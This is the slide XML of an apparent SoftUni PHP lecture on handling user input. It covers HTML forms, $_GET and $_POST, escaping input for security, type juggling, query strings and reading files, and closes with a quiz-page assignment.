              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>bar&amp;baz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>boom&amp;cow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>milk&amp;php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>hypertext+processor</a:t>
            </a:r>
            <a:endParaRPr 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13136" y="5715000"/>
            <a:ext cx="11277600" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -857"/>
              <a:gd name="adj2" fmla="val -193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foo=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>bar&amp;amp;baz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>boom&amp;amp;cow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>milk&amp;amp;php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>hypertext+processor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9645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8812" y="1524000"/>
            <a:ext cx="5832475" cy="94108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Files</a:t>
            </a:r>
            <a:endParaRPr lang="bg-B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0049" y="2819400"/>
            <a:ext cx="3810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200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Files are the basic way to store data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 PHP, there are many ways to read a file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6924" y="1858535"/>
            <a:ext cx="10591800" cy="80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we have a file with name names.txt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$content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file_get_contents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(names.txt);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96924" y="3811990"/>
            <a:ext cx="10591800" cy="25610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$lines = file('test.txt');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc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Loop through our array, show HTML source as HTML source; and line numbers too.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($lines as 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line_num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$line) {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"Line #&lt;b&gt;{$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line_num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}&lt;/b&gt; : " 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htmlspecialchars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($line) . "&lt;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/&gt;\n";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3286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1812" y="3200400"/>
            <a:ext cx="3582132" cy="31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578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file questions.txt that is in the following format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>First line – question id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Second line – question text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Third line – question answer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Create a web page that displays the question text and a user input for each question </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Create a PHP Script as a POST action which checks if the answers are correct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4150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Forms are used for data submission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Data should always be escaped for security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>reasons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Be careful with different variable types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Information could also be stored in files</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>with PHP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12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9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1168232"/>
            <a:ext cx="11804822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 user data, submitted to the server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>They are sets of fields that determine the types of data to be sent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>The server receives the filled-in data and produces new page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>To handle the submitted data you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>need another script</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>The forms data is similar to arguments to a normal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50352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15" y="2979924"/>
            <a:ext cx="4290052" cy="168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PHP script receives </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>data as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>$_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>GET and $_POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>arrays </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>and runs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1087501"/>
            <a:ext cx="5295900" cy="1562100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4494212" y="3188648"/>
            <a:ext cx="7396035" cy="1270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"Welcome ".$_POST ['username'] ."!";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923212" y="4991103"/>
            <a:ext cx="4038600" cy="15621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Print input on HTML page</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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94182" y="4991103"/>
            <a:ext cx="3079318" cy="16215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Svetlin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03912" y="2713221"/>
            <a:ext cx="571500" cy="475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73500" y="4478404"/>
            <a:ext cx="2030412" cy="7477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466012" y="1455921"/>
            <a:ext cx="4038600" cy="15621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The user enters data and submit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0385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748" y="1591865"/>
            <a:ext cx="10439400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GET &amp;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7948" y="2667000"/>
            <a:ext cx="5715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037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GET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2" y="1168232"/>
            <a:ext cx="9829800" cy="5156368"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>PHP receives the data in the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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>arrays</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>URL parameters go into the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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Data from forms with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method="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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post" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>go </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>into the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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The request method is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>We can check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>what is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>current request method in the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$_SERVER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Both arrays are global and can be used as any other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74507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66" y="990600"/>
            <a:ext cx="11804822" cy="556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$_POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>associative array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>The name attribute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>form input becomes key in the array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>If in the example form the user fills </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>"Mario" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>and "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>pass123":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test.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> will start with built-in array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sz="2800" dirty="0"/>
              <a:t>":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$_POST['name'] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>will be "Mario"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$_POST['password'] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>will be "pass123"</a:t>
            </a:r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4377" y="2819400"/>
            <a:ext cx="10591800" cy="16215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method="post" action="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index.php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type="text" name="name" /&gt;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type="password" name="password" /&gt;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404544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POST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9012" y="3352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824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1773</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>280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SoftUni 16x9</vt:lpstr>
      <vt:lpstr>Working with User Input</vt:lpstr>
      <vt:lpstr>Table of Contents</vt:lpstr>
      <vt:lpstr>HTML Forms</vt:lpstr>
      <vt:lpstr>Html Forms</vt:lpstr>
      <vt:lpstr>How Does It Work</vt:lpstr>
      <vt:lpstr>GET &amp;</vt:lpstr>
      <vt:lpstr>POST and GET</vt:lpstr>
      <vt:lpstr>POST</vt:lpstr>
      <vt:lpstr>POST</vt:lpstr>
      <vt:lpstr>POST and GET</vt:lpstr>
      <vt:lpstr>GET</vt:lpstr>
      <vt:lpstr>$_POST VS $_GET</vt:lpstr>
      <vt:lpstr>Determine The Request Type</vt:lpstr>
      <vt:lpstr>Input Form</vt:lpstr>
      <vt:lpstr>Escaping</vt:lpstr>
      <vt:lpstr>Escaping User Input</vt:lpstr>
      <vt:lpstr>Escaping User Input{2}</vt:lpstr>
      <vt:lpstr>Escaping</vt:lpstr>
      <vt:lpstr>Types Juggling</vt:lpstr>
      <vt:lpstr>Types Juggling (2)</vt:lpstr>
      <vt:lpstr>Types Juggling</vt:lpstr>
      <vt:lpstr>Types Casting</vt:lpstr>
      <vt:lpstr>Types Casting</vt:lpstr>
      <vt:lpstr>Escaping Strings</vt:lpstr>
      <vt:lpstr>Escaping User Input</vt:lpstr>
      <vt:lpstr>Escaping User Input {2}</vt:lpstr>
      <vt:lpstr>Escaping User Input {3}</vt:lpstr>
      <vt:lpstr>Escaping User Input {4}</vt:lpstr>
      <vt:lpstr>PHP Automatic Escaping Engine</vt:lpstr>
      <vt:lpstr>Query Strings</vt:lpstr>
      <vt:lpstr>What is Query String</vt:lpstr>
      <vt:lpstr>Build Query String</vt:lpstr>
      <vt:lpstr>Files</vt:lpstr>
      <vt:lpstr>Reading files</vt:lpstr>
      <vt:lpstr>Files</vt:lpstr>
      <vt:lpstr>Assignment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2014-06-27T14:54:22Z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